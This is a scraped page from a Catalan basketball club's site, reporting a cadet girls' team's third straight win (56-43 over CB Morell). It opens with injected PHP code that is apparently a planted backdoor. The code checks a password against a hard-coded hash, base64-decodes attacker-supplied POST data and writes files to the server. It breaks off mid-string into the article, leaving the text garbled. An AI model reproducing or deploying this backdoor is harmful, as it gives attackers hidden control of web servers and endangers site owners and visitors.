function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 03 B guanya el CB Morell i encadena la tercera victòria seguida (56-43) - Tgn Bàsquet Club -

El cadet femení 03 B guanya el CB Morell i encadena la tercera victòria seguida (56-43)

Updated: desembre 5, 2017

L’equip cadet femení 03 B va vèncer el CB Morell i d’aquesta manera suma la tercera victòria seguida. Les noies entrenades per José Córcoles van sortir molt bé a la pista però la bona feina feta en els primers deu minuts es va enfosquir en el segon període en què van rebre un parcial de 13-24 (26-32 al descans). Amb tot la millora en la intensitat defensiva i l’encert en el tir exterior (tres triples en deu minuts) en aquest tercer quart, van capgirar la dinàmica i en els últims deu minuts, un parcial de sortida de 17-0 va sentenciar.